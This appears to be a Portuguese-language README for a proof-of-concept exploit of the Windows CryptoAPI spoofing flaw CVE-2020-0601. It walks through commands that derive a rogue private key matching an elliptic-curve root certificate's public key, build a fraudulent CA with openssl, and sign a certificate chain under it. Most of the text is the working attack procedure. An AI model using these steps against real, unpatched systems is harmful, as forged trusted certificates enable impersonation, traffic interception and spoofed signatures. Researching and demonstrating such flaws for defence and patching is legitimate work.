
Exploit de prova de conceito para a vulnerabilidade de falsificação do Windows CryptoAPI CVE-2020-0601, demonstrando a geração de certificado de CA malicioso usando manipulação de chaves de curva elíptica.
CVE-2020-0601: Exploração da vulnerabilidade de falsificação do Windows CryptoAPI. Mais informações em nosso post no blog.
pip install -U -r requirements.txt
A geração de certificados funciona com a versão do OpenSSL até 1.0.2u.
Usamos a USERTrust ECC Certification Authority mas pode ser qualquer certificado raiz funcionando na curva P-384.
Para gerar uma chave privada que corresponda à chave pública do certificado raiz usamos o script gen-key.py (funciona com Python 3.6 e superior):
$ ./gen-key.py RootCert.pem
A chave pode ser exibida com:
$ openssl ec -in p384-key-rogue.pem -text
Em seguida, para gerar o CA fraudulento:
$ openssl req -key p384-key-rogue.pem -new -out ca-rogue.pem -x509 -config ca.cnf -days 500
Então geramos a seguinte chave privada e certificado:
openssl ecparam -name prime256v1 -genkey -noout -out prime256v1-privkey.pem
openssl req -key prime256v1-privkey.pem -config openssl.cnf -new -out prime256v1.csr
openssl x509 -req -in prime256v1.csr -CA ca-rogue.pem -CAkey p384-key-rogue.pem -CAcreateserial -out client-cert.pem -days 500 -extensions v3_req -extfile openssl.cnf
Finalmente, para ter a cadeia completa em um único arquivo, concatenamos o CA e os certificados do servidor:
cat client-cert.pem ca-rogue.pem > cert.pem